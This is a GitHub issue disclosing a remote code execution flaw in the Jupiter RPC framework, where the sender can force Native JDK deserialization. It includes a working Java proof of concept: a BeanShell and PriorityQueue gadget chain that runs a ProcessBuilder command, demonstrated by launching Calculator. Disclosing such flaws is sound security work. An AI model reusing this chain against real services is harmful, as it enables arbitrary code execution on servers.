Another approach capable of achieving RCE attacks
adv851 opened this issue · comments
Problem Description
As Jupiter's deserialization protocol is dictated by the sender's request configuration, attackers can induce the Provider side to employ the Native JDK protocol for deserializing carefully crafted serialized data, thereby accomplishing an RCE attack.
Reproduce
Provider
We employed the built-in module "jupiter-example" of the project to set up the test environment for the attack. The JDK version used is 8u65.
POC
At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects, one is selected here as an example, and this chain depends on the following JAR files).
<dependency>
<groupId>org.beanshell</groupId>
<artifactId>bsh</artifactId>
<version>2.0b5</version>
</dependency>
public static Object getBshObject() throws Exception {
// BeanShell payload
String payload =
"compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
Strings.join( // does not support spaces in quotes
Arrays.asList("open /System/Applications/Calculator.app".replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
",", "\"", "\"") +
"}).start();return new Integer(1);}";
// Create Interpreter
Interpreter i = new Interpreter();
// Evaluate payload
i.eval(payload);
// Create InvocationHandler
XThis xt = new XThis(i.getNameSpace(), i);
InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);
// Create Comparator Proxy
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] {1,1};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);
return priorityQueue;
}
Attack Impact
Capable of executing an RCE attack, in this attack test, it is demonstrated through the launch of the calculator application.